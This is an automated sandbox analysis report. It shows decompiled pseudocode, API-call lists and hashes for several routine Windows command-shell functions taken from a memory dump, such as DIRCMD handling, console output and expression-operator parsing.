                                              0x002a8ffd
                                              0x002a9000
                                              0x00000000
                                              0x002a9000
                                              0x002a8fef
                                              0x002a900e
                                              0x00000000
                                              0x00000000
                                              0x002a9014
                                              0x002a9019
                                              0x00000000
                                              0x00000000
                                              0x002a9023
                                              0x002a902c
                                              0x002a902e
                                              0x002a9033
                                              0x00000000
                                              0x00000000
                                              0x002a9039
                                              0x002a9039
                                              0x002a903e
                                              0x00000000
                                              0x00000000
                                              0x002a9046
                                              0x002c08dd
                                              0x00000000
                                              0x00000000
                                              0x002c08e3
                                              0x002c08e5
                                              0x00000000
                                              0x002c08e5
                                              0x002a9051
                                              0x00000000
                                              0x00000000
                                              0x002a9057
                                              0x002a9059
                                              0x002a905b
                                              0x002a905d
                                              0x002a905d
                                              0x002a9060
                                              0x002a9063
                                              0x002a9066
                                              0x002a9069
                                              0x002a906e
                                              0x00000000
                                              0x00000000
                                              0x002a9076
                                              0x002a908e
                                              0x002a9090
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a9090
                                              0x002a9078
                                              0x002a907e
                                              0x00000000
                                              0x00000000
                                              0x002a9080
                                              0x002a9083
                                              0x002a9086
                                              0x002a9089
                                              0x002a908a
                                              0x002a908b
                                              0x002a908b
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • _wcsnicmp.MSVCRT ref: 002A91B7
                                              • wcstol.MSVCRT ref: 002A91FC
                                              • wcstol.MSVCRT ref: 002A928A
                                              • longjmp.MSVCRT(?,000000FF,40F69E4C,-00000002,?,00000000), ref: 002C08B2
                                              • longjmp.MSVCRT(?,000000FF), ref: 002C08C6
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                              • String ID:
                                              • API String ID: 2863075230-0
                                              • Opcode ID: 8db0dd9d833b8843ec782b48fd32058bdbf5768de8c1ad55c23725075dcb606f
                                              • Instruction ID: de97cf474560caf295a8ae59b9df283495d88feca36da026f6b440291d6ebd68
                                              • Opcode Fuzzy Hash: 8db0dd9d833b8843ec782b48fd32058bdbf5768de8c1ad55c23725075dcb606f
                                              • Instruction Fuzzy Hash: A2F1D175D20216CBCF24DF9AC8806FEB7B5AF89740F29425ED816A7380EB715D91CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B4F66, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E002B4F66(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				WCHAR* _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				char _v1076;
				void _v1084;
				void* _v1096;
				int _v1100;
				WCHAR* _v1104;
				WCHAR* _v1108;
				char _v1112;
				WCHAR* _v1116;
				int _v1120;
				void* _v1124;
				intOrPtr _v1128;
				void* _v1138;
				int _v1142;
				int _v1146;
				int _v1150;
				int _v1154;
				int _v1158;
				int _v1162;
				int _v1166;
				int _v1170;
				short _v1172;
				int _v1176;
				WCHAR* _v1180;
				int _v1184;
				char _v1188;
				int _v1192;
				int _v1196;
				intOrPtr _v1200;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t78;
				WCHAR* _t97;
				signed int _t101;
				char _t112;
				void* _t113;
				void* _t135;
				void* _t139;
				intOrPtr _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;

				_t130 = __edx;
				_t143 = (_t141 & 0xfffffff8) - 0x4ac;
				_t78 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t78 ^ _t143;
				_v1200 = __ecx;
				_v1180 = 0;
				_v1172 = 0;
				_v1196 = 0;
				_v1192 = 0;
				_v1188 = 0;
				_t112 = 1;
				_v1184 = 0;
				_v1176 = 0;
				_v1170 = 0;
				_v1166 = 0;
				_v1162 = 0;
				_v1158 = 0;
				_v1154 = 0;
				_v1150 = 0;
				_v1146 = 0;
				_v1142 = 0;
				asm("stosd");
				_v564 = 0;
				asm("stosd");
				_v560 = 1;
				_v556 = 0x104;
				asm("stosd");
				asm("stosw");
				_v1124 = 0;
				_v1120 = 0;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1104 = 0;
				_v1100 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				memset( &_v1084, 0, 0x104);
				_t144 = _t143 + 0xc;
				if(E002B0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L14:
					__imp__??_V@YAXPAX@Z(_v564);
					_pop(_t135);
					_pop(_t139);
					_pop(_t113);
					return E002B6FD0(_t112, _t113, _v8 ^ _t144, _t130, _t135, _t139);
				}
				_t140 =  *0x2e3cd8;
				_v1192 = 6;
				_v20 = 0x104;
				_v1188 = 0;
				_v1196 = 0x8000;
				_v1124 = 0;
				_v1104 = 0;
				_v28 = 0;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_t144 = _t144 + 0xc;
				if(E002B0C70( &_v548, GetEnvironmentVariableW(L"DIRCMD", 0, 0)) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					goto L14;
				}
				_t97 = _v28;
				if(_t97 == 0) {
					_t97 =  &_v548;
				}
				if(GetEnvironmentVariableW(L"DIRCMD", _t97, _v20) != 0) {
					_t122 = _v28;
					if(_v28 == 0) {
						_t122 =  &_v548;
					}
					if(E002ACB48( &_v1196) == _t112) {
						_push(0);
						_push(0x2377);
						E002AC5A2(_t122);
					}
				}
				_t130 =  &_v1196;
				if(E002ACB48( &_v1196) != _t112) {
					_t101 = _v1196;
					if((_t101 & 0x00000040) != 0) {
						_t101 = _t101 & 0xfffb79fb;
						_v1196 = _t101;
					}
					if((_t101 & 0x00000400) != 0) {
						_v1196 = _t101 & 0xfffffdbb;
					}
					_t124 = _v564;
					if(_v564 == 0) {
						_t124 =  &_v1084;
					}
					_t130 = _v556;
					E002B36CB(_t112, _t124, _v556, 0);
					if(_v1128 == 0) {
						_t125 = _v564;
						_v1124 = _t112;
						if(_v564 == 0) {
							_t125 =  &_v1084;
						}
						_v1120 = E002B297B(_t125);
						_v1112 = _t112;
						_v1116 = 0;
						_v1108 = 0;
					}
					_t112 = E002B2DD2( &_v1188, _t130);
					_t106 = _v556;
					if(_v556 == 0) {
						_t106 =  &_v1076;
					}
					E002B0BFC(_t106, _v548);
					E002B2A06(_t140, 0);
				}
				goto L13;
			}






















































                                              0x002b4f66
                                              0x002b4f6e
                                              0x002b4f74
                                              0x002b4f7b
                                              0x002b4f85
                                              0x002b4f8b
                                              0x002b4f8f
                                              0x002b4f98
                                              0x002b4fa0
                                              0x002b4fa9
                                              0x002b4fad
                                              0x002b4fae
                                              0x002b4fb2
                                              0x002b4fb6
                                              0x002b4fba
                                              0x002b4fbe
                                              0x002b4fc2
                                              0x002b4fc6
                                              0x002b4fca
                                              0x002b4fce
                                              0x002b4fd2
                                              0x002b4fd6
                                              0x002b4fd9
                                              0x002b4fe0
                                              0x002b4fe1
                                              0x002b4fe8
                                              0x002b4fef
                                              0x002b4ff0
                                              0x002b4ff4
                                              0x002b4ffc
                                              0x002b5000
                                              0x002b5004
                                              0x002b5008
                                              0x002b500c
                                              0x002b5010
                                              0x002b5014
                                              0x002b5015
                                              0x002b5016
                                              0x002b501f
                                              0x002b502d
                                              0x002b504a
                                              0x002b5176
                                              0x002b517d
                                              0x002b518d
                                              0x002b518e
                                              0x002b518f
                                              0x002b519a
                                              0x002b519a
                                              0x002b5050
                                              0x002b505d
                                              0x002b5066
                                              0x002b5076
                                              0x002b507a
                                              0x002b5082
                                              0x002b5086
                                              0x002b508a
                                              0x002b5091
                                              0x002b5098
                                              0x002b509d
                                              0x002b50bc
                                              0x002b5168
                                              0x002b516f
                                              0x00000000
                                              0x002b5175
                                              0x002b50c2
                                              0x002b50cb
                                              0x002b50cd
                                              0x002b50cd
                                              0x002b50e9
                                              0x002bf084
                                              0x002bf08d
                                              0x002bf08f
                                              0x002bf08f
                                              0x002bf0a1
                                              0x002bf0a7
                                              0x002bf0a8
                                              0x002bf0ad
                                              0x002bf0b3
                                              0x002bf0a1
                                              0x002b50f3
                                              0x002b50fe
                                              0x002b5100
                                              0x002b5106
                                              0x002b5108
                                              0x002b510d
                                              0x002b510d
                                              0x002b5116
                                              0x002bf0be
                                              0x002bf0be
                                              0x002b511c
                                              0x002b5125
                                              0x002b519b
                                              0x002b519b
                                              0x002b5127
                                              0x002b512f
                                              0x002b5138
                                              0x002bf0c7
                                              0x002bf0ce
                                              0x002bf0d4
                                              0x002bf0d6
                                              0x002bf0d6
                                              0x002bf0e2
                                              0x002bf0e6
                                              0x002bf0ea
                                              0x002bf0ee
                                              0x002bf0ee
                                              0x002b5147
                                              0x002b5149
                                              0x002b5152
                                              0x002b51a4
                                              0x002b51a4
                                              0x002b515c
                                              0x002b5163
                                              0x002b5163
                                              0x00000000

                                              APIs
                                              • memset.MSVCRT ref: 002B501F
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • memset.MSVCRT ref: 002B5098
                                              • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 002B50A7
                                              • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 002B50E1
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B516F
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B517D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$EnvironmentVariable
                                              • String ID: DIRCMD
                                              • API String ID: 1405722092-1465291664
                                              • Opcode ID: 8d3f4dd1e1112c24ed0cf1d3739114d2af07c91e60ae398f7ac703ee9b2687dc
                                              • Instruction ID: ddce69dc501633b65490b37fffc68fc770e965cd31c0652f7cef95e356e0fbdd
                                              • Opcode Fuzzy Hash: 8d3f4dd1e1112c24ed0cf1d3739114d2af07c91e60ae398f7ac703ee9b2687dc
                                              • Instruction Fuzzy Hash: F67177B192C7829FD364DF29D88569BBBE4BFC9340F10492EF18987260DB309818CB57
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C196F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E002C196F(void** __ecx, intOrPtr _a4, signed int _a12, signed int _a16) {
				void* _v0;
				signed int _v8;
				char _v532;
				void** _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				short* _t26;
				void* _t29;
				void* _t31;
				signed int* _t38;
				void** _t40;
				long _t41;
				signed int _t42;
				signed int _t47;
				char* _t48;
				void* _t55;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t63;
				void* _t64;
				signed int _t65;

				_t20 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t20 ^ _t65;
				_t59 = _a12;
				_t40 = __ecx;
				_v536 = __ecx;
				_t24 = _t59 & 0x80000000 | _a16;
				if((_t59 & 0x80000000 | _a16) != 0) {
					E002B80F2(_t24);
				}
				E002B1040( &_v532, 0x104, _a4);
				_t57 = 0x104;
				_t26 =  &_v532;
				while( *_t26 != 0) {
					_t26 = _t26 + 2;
					_t57 = _t57 - 1;
					if(_t57 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t47 =  ~_t57 & 0x00000104 - _t57;
				if(_t57 != 0) {
					_t38 =  &_v532 + _t47 * 2;
					_t64 = 0x104 - _t47;
					if(_t64 == 0) {
						L14:
						_t38 = _t38 - 2;
					} else {
						_t55 = 0x7ffffffe;
						_t57 = L"_p0" - _t38;
						while(_t55 != 0) {
							_t42 =  *(_t38 + _t57) & 0x0000ffff;
							if(_t42 == 0) {
								break;
							} else {
								 *_t38 = _t42;
								_t55 = _t55 - 1;
								_t38 =  &(_t38[0]);
								_t64 = _t64 - 1;
								if(_t64 != 0) {
									continue;
								} else {
									L13:
									_t40 = _v536;
									goto L14;
								}
							}
							goto L16;
						}
						if(_t64 != 0) {
							_t40 = _v536;
						} else {
							goto L13;
						}
					}
					L16:
					 *_t38 = 0;
				}
				_t60 = _t59 & 0x7fffffff;
				_t29 = _t60;
				if(_t60 <= 0) {
					_t29 = 1;
				}
				_t48 =  &_v532;
				__imp__CreateSemaphoreExW(0, _t60, _t29, _t48, 0, 0x1f0003);
				_t61 = _t29;
				if(_t61 == 0) {
					_t57 = 0x1621;
					_t63 = E002C2913("internal\\sdk\\inc\\wil\\ResultMacros.h");
					if(_t63 >= 0) {
						goto L25;
					} else {
						_t57 = 0x84;
						E002C292C("wil", _t63);
						_t31 = _t63;
					}
				} else {
					_t63 =  *_t40;
					if(_t63 != 0) {
						_t41 = GetLastError();
						if(CloseHandle(_t63) == 0) {
							_push(_t48);
							_t57 = 0x879;
							E002C2D56();
						}
						SetLastError(_t41);
						_t40 = _v536;
					}
					 *_t40 = _t61;
					L25:
					_t31 = 0;
				}
				return E002B6FD0(_t31, _t40, _v8 ^ _t65, _t57, _t61, _t63);
			}




























                                              0x002c197a
                                              0x002c1981
                                              0x002c1987
                                              0x002c198a
                                              0x002c198e
                                              0x002c1999
                                              0x002c199c
                                              0x002c199e
                                              0x002c199e
                                              0x002c19b3
                                              0x002c19b8
                                              0x002c19ba
                                              0x002c19c0
                                              0x002c19c6
                                              0x002c19c9
                                              0x002c19cc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c19cc
                                              0x002c19d6
                                              0x002c19d8
                                              0x002c19dc
                                              0x002c19e4
                                              0x002c19e7
                                              0x002c19e9
                                              0x002c1a1c
                                              0x002c1a1c
                                              0x002c19eb
                                              0x002c19f0
                                              0x002c19f5
                                              0x002c19f7
                                              0x002c19fb
                                              0x002c1a02
                                              0x00000000
                                              0x002c1a04
                                              0x002c1a04
                                              0x002c1a07
                                              0x002c1a08
                                              0x002c1a0b
                                              0x002c1a0e
                                              0x00000000
                                              0x002c1a10
                                              0x002c1a16
                                              0x002c1a16
                                              0x00000000
                                              0x002c1a16
                                              0x002c1a0e
                                              0x00000000
                                              0x002c1a02
                                              0x002c1a14
                                              0x002c1a21
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c1a14
                                              0x002c1a27
                                              0x002c1a29
                                              0x002c1a29
                                              0x002c1a2c
                                              0x002c1a32
                                              0x002c1a34
                                              0x002c1a36
                                              0x002c1a36
                                              0x002c1a42
                                              0x002c1a4d
                                              0x002c1a53
                                              0x002c1a57
                                              0x002c1aa7
                                              0x002c1ab6
                                              0x002c1aba
                                              0x00000000
                                              0x002c1abc
                                              0x002c1abf
                                              0x002c1aca
                                              0x002c1acf
                                              0x002c1acf
                                              0x002c1a59
                                              0x002c1a59
                                              0x002c1a5d
                                              0x002c1a66
                                              0x002c1a70
                                              0x002c1a72
                                              0x002c1a76
                                              0x002c1a7b
                                              0x002c1a7b
                                              0x002c1a81
                                              0x002c1a87
                                              0x002c1a87
                                              0x002c1a8d
                                              0x002c1a8f
                                              0x002c1a8f
                                              0x002c1a8f
                                              0x002c1aa1

                                              APIs
                                              • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 002C1A4D
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002C1A5F
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 002C1A68
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 002C1A81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ErrorLast$CloseCreateHandleSemaphore
                                              • String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
                                              • API String ID: 2276426104-46676964
                                              • Opcode ID: e29a52d2034ca7867282862d2b6df5dc71686ae843e92ebdff102638e65e760a
                                              • Instruction ID: 5a279f11d0914f2f2445a7ab9d6ecf6de7255e2661785cd2db2770df5cac92ef
                                              • Opcode Fuzzy Hash: e29a52d2034ca7867282862d2b6df5dc71686ae843e92ebdff102638e65e760a
                                              • Instruction Fuzzy Hash: F7410731B6111A9BDB249F28DD56FAA33A5EF56310F24425DF809DB285DE70CD20CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A6785, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E002A6785(signed short** __ecx, signed short** __edx, void* __eflags, signed short** _a4) {
				signed short* _t8;
				signed short _t9;
				long _t13;
				signed short** _t18;
				signed short _t25;
				long _t32;
				wchar_t* _t33;
				signed short** _t34;

				_t18 = __edx;
				_t34 = __ecx;
				E002A9794(__ecx);
				_t32 =  *( *_t34) & 0x0000ffff;
				if(_t32 == 0 || iswdigit(_t32) != 0 || wcschr(L"<>+-*/%()|^&=,", _t32) != 0) {
					L12:
					return 0;
				} else {
					_t33 = L"+-~!";
					if(wcschr(_t33, _t32) != 0) {
						goto L12;
					}
					_t8 =  *_t34;
					 *_t18 = _t8;
					while(1) {
						_t9 =  *_t8 & 0x0000ffff;
						_t25 = _t9;
						if(_t9 == 0) {
							break;
						}
						_t13 = _t25 & 0x0000ffff;
						if(_t13 <= 0x20 || wcschr(_t33, _t13) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t34) & 0x0000ffff) != 0) {
							break;
						} else {
							 *_t34 =  &(( *_t34)[1]);
							_t8 =  *_t34;
							continue;
						}
					}
					 *_a4 =  *_t34;
					return 1;
				}
			}











                                              0x002a678d
                                              0x002a678f
                                              0x002a6791
                                              0x002a6798
                                              0x002a679e
                                              0x002a6828
                                              0x00000000
                                              0x002a67c2
                                              0x002a67c3
                                              0x002a67d3
                                              0x00000000
                                              0x00000000
                                              0x002a67d5
                                              0x002a67d7
                                              0x002a67d9
                                              0x002a67d9
                                              0x002a67dc
                                              0x002a67e1
                                              0x00000000
                                              0x00000000
                                              0x002a67e3
                                              0x002a67e9
                                              0x00000000
                                              0x002a6810
                                              0x002a6810
                                              0x002a6813
                                              0x00000000
                                              0x002a6813
                                              0x002a67e9
                                              0x002a681c
                                              0x00000000
                                              0x002a6820

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$iswdigit
                                              • String ID: +-~!$<>+-*/%()|^&=,
                                              • API String ID: 2770779731-632268628
                                              • Opcode ID: d2dafcb18f6362a03de735fc092eb60200f31a75f81b843f3ad589f1a4a7082a
                                              • Instruction ID: 3f94e9c81fa026e778d103f7b4221f541959dd1ed7077b9cd6633ef97689f474
                                              • Opcode Fuzzy Hash: d2dafcb18f6362a03de735fc092eb60200f31a75f81b843f3ad589f1a4a7082a
                                              • Instruction Fuzzy Hash: AF11B2762642439F9B249F2AE84C876B7ECEF9B771324042EF480C7680FF259C249660
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AB610, Relevance: 12.2, APIs: 8, Instructions: 188COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 50%
                                              			E002AB610(void* __ebx, void** __ecx, void* __edi) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				void* _t37;
				intOrPtr _t39;
				void* _t40;
				void* _t52;
				long _t55;
				long _t56;
				void* _t57;
				long _t61;
				void* _t66;
				long _t73;
				void* _t85;
				void* _t87;
				void** _t101;
				long _t104;

				_t101 = __ecx;
				_t37 = E002B269C(E002AB6B9(__ecx));
				_t104 = _t101[4];
				if(_t37 != 0) {
					_t39 = _t104 + _t101[2] * 2;
					_v12 = _t39;
					__eflags = _t104 - _t39;
					if(_t104 < _t39) {
						_t85 = 0x2022;
						while(1) {
							_t73 = _t104;
							__eflags = _t104 - _t39;
							if(_t104 >= _t39) {
								goto L3;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								__eflags =  *_t73 - _t85;
								if( *_t73 == _t85) {
									break;
								}
								_t73 = 2 + _t73;
								__eflags = _t73 - _t39;
								if(_t73 < _t39) {
									continue;
								}
								break;
							}
							__eflags = _t73 - _t104;
							if(_t73 == _t104) {
								goto L20;
							} else {
								_t66 = _t73 - _t104 >> 1;
								_v16 = _t66;
								__imp___get_osfhandle(0);
								_t54 = WriteConsoleW(_t66, 1, _t104, _t66,  &_v8);
								__eflags = _t54;
								if(_t54 == 0) {
									goto L30;
								} else {
									_t54 = _v16;
									__eflags = _v8 - _v16;
									if(_v8 != _v16) {
										goto L30;
									} else {
										_t39 = _v12;
										_t104 = _t73;
										_t85 = 0x2022;
										while(1) {
											L20:
											__eflags = _t73 - _t39;
											if(_t73 >= _t39) {
												break;
											}
											__eflags =  *_t73 - _t85;
											if( *_t73 == _t85) {
												_t73 = 2 + _t73;
												__eflags = _t73;
												continue;
											}
											break;
										}
										__eflags = _t73 - _t104;
										if(_t73 == _t104) {
											L27:
											_t85 = 0x2022;
											__eflags = _t104 - _t39;
											if(_t104 < _t39) {
												continue;
											} else {
												goto L3;
											}
										} else {
											__eflags =  *_t101;
											if( *_t101 != 0) {
												SetConsoleMode( *_t101, 2);
											}
											_t52 = _t73 - _t104 >> 1;
											_v16 = _t52;
											__imp___get_osfhandle(_t104, _t52,  &_v8, 0);
											_t87 = 1;
											_t104 = WriteConsoleW(_t52, ??, ??, ??, ??);
											_t54 = E002B06C0(_t87);
											__eflags = _t104;
											if(_t104 == 0) {
												goto L30;
											} else {
												_t54 = _v16;
												__eflags = _v8 - _v16;
												if(_v8 != _v16) {
													goto L30;
												} else {
													_t39 = _v12;
													_t104 = _t73;
													goto L27;
												}
											}
										}
									}
								}
							}
							goto L38;
						}
					}
					goto L3;
				} else {
					if(E002B27C8(_t101[2] + _t101[2], _t104, _t101[2] + _t101[2],  &_v8) == 0) {
						L30:
						_t89 = 1;
						_t55 = E002B0178(_t54);
						__eflags = _t55;
						if(_t55 == 0) {
							_t89 = 1;
							_t56 = E002C9953(_t55, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								_push(_t56);
								_push(0x70);
								goto L34;
							}
						} else {
							_push(0);
							_push(0x1d);
							L34:
							E002AC5A2(_t89);
							_pop(_t89);
						}
						_t57 = E002C9287(_t89);
						__imp__longjmp(0x2db8b8, 1);
						asm("int3");
						__eflags =  *(_t104 + 4) - _t57;
						if(__eflags < 0) {
							return _t57;
						} else {
							E002C3BB0(__eflags, 0);
							 *(_t104 + 4) =  *(_t104 + 4) & 0x00000000;
							E002B4F29(_t104);
							_t61 =  *((intOrPtr*)(_t104 + 0x1c)) - 1;
							__eflags = _t61;
							 *(_t104 + 0x24) = _t61;
							return _t61;
						}
					} else {
						_t70 = _t101[2];
						_t54 = _t101[2] + _t70;
						if(_v8 != _t101[2] + _t70) {
							goto L30;
						} else {
							L3:
							_t40 = E002B269C(_t39);
							if(_t40 != 0) {
								__imp___get_osfhandle(0);
								WriteConsoleW( &_v8, 1, L"\r\n", 2,  &_v8);
							} else {
								E002B27C8( &_v8, L"\r\n", 4,  &_v8);
							}
							_t101[1] = _t101[1] + E002ABED7(_t101, _t101[4]) + 1;
							E002AB6B9(_t101);
							if(_t101[1] > _t101[7]) {
								_t101[1] = _t101[1] & 0x00000000;
							}
							 *(_t101[4]) = 0;
							_t101[2] = _t101[2] & 0;
							return 0;
						}
					}
				}
				L38:
			}




















                                              0x002ab61b
                                              0x002ab625
                                              0x002ab62a
                                              0x002ab62f
                                              0x002b983d
                                              0x002b9840
                                              0x002b9843
                                              0x002b9845
                                              0x002b984b
                                              0x002b9850
                                              0x002b9850
                                              0x002b9852
                                              0x002b9854
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b985a
                                              0x002b985a
                                              0x002b985a
                                              0x002b985d
                                              0x00000000
                                              0x00000000
                                              0x002b985f
                                              0x002b9862
                                              0x002b9864
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b9864
                                              0x002b9866
                                              0x002b9868
                                              0x00000000
                                              0x002b986a
                                              0x002b9874
                                              0x002b987a
                                              0x002b987d
                                              0x002b9885
                                              0x002b988b
                                              0x002b988d
                                              0x00000000
                                              0x002b9893
                                              0x002b9893
                                              0x002b9896
                                              0x002b9899
                                              0x00000000
                                              0x002b989f
                                              0x002b989f
                                              0x002b98a2
                                              0x002b98a4
                                              0x002b98b3
                                              0x002b98b3
                                              0x002b98b3
                                              0x002b98b5
                                              0x00000000
                                              0x00000000
                                              0x002b98ab
                                              0x002b98ae
                                              0x002b98b0
                                              0x002b98b0
                                              0x00000000
                                              0x002b98b0
                                              0x00000000
                                              0x002b98ae
                                              0x002b98b7
                                              0x002b98b9
                                              0x002b9903
                                              0x002b9903
                                              0x002b9908
                                              0x002b990a
                                              0x00000000
                                              0x002b9910
                                              0x00000000
                                              0x002b9910
                                              0x002b98bb
                                              0x002b98bb
                                              0x002b98be
                                              0x002b98c4
                                              0x002b98c4
                                              0x002b98d4
                                              0x002b98da
                                              0x002b98dd
                                              0x002b98e3
                                              0x002b98eb
                                              0x002b98ed
                                              0x002b98f2
                                              0x002b98f4
                                              0x00000000
                                              0x002b98f6
                                              0x002b98f6
                                              0x002b98f9
                                              0x002b98fc
                                              0x00000000
                                              0x002b98fe
                                              0x002b98fe
                                              0x002b9901
                                              0x00000000
                                              0x002b9901
                                              0x002b98fc
                                              0x002b98f4
                                              0x002b98b9
                                              0x002b9899
                                              0x002b988d
                                              0x00000000
                                              0x002b9868
                                              0x002b9850
                                              0x00000000
                                              0x002ab635
                                              0x002ab64b
                                              0x002b9934
                                              0x002b9936
                                              0x002b9937
                                              0x002b993c
                                              0x002b993e
                                              0x002b9948
                                              0x002b9949
                                              0x002b994e
                                              0x002b9950
                                              0x002b9952
                                              0x002b9953
                                              0x00000000
                                              0x002b9953
                                              0x002b9940
                                              0x002b9940
                                              0x002b9942
                                              0x002b9955
                                              0x002b9955
                                              0x002b995b
                                              0x002b995b
                                              0x002b995c
                                              0x002b9968
                                              0x002b996e
                                              0x002b996f
                                              0x002b9972
                                              0x002ab6ca
                                              0x002b9978
                                              0x002b997a
                                              0x002b997f
                                              0x002b9985
                                              0x002b998d
                                              0x002b998d
                                              0x002b998e
                                              0x002b9992
                                              0x002b9992
                                              0x002ab651
                                              0x002ab651
                                              0x002ab654
                                              0x002ab659
                                              0x00000000
                                              0x002ab65f
                                              0x002ab65f
                                              0x002ab662
                                              0x002ab66c
                                              0x002b9921
                                              0x002b9929
                                              0x002ab672
                                              0x002ab67d
                                              0x002ab67d
                                              0x002ab68f
                                              0x002ab692
                                              0x002ab69d
                                              0x002ab6b3
                                              0x002ab6b3
                                              0x002ab6a4
                                              0x002ab6a7
                                              0x002ab6b2
                                              0x002ab6b2
                                              0x002ab659
                                              0x002ab64b
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002B269C: _get_osfhandle.MSVCRT ref: 002B26A7
                                                • Part of subcall function 002B269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002AC5F8,?,?,?), ref: 002B26B6
                                                • Part of subcall function 002B269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26D2
                                                • Part of subcall function 002B269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,00000002), ref: 002B26E1
                                                • Part of subcall function 002B269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002B26EC
                                                • Part of subcall function 002B269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26F5
                                              • _get_osfhandle.MSVCRT ref: 002B987D
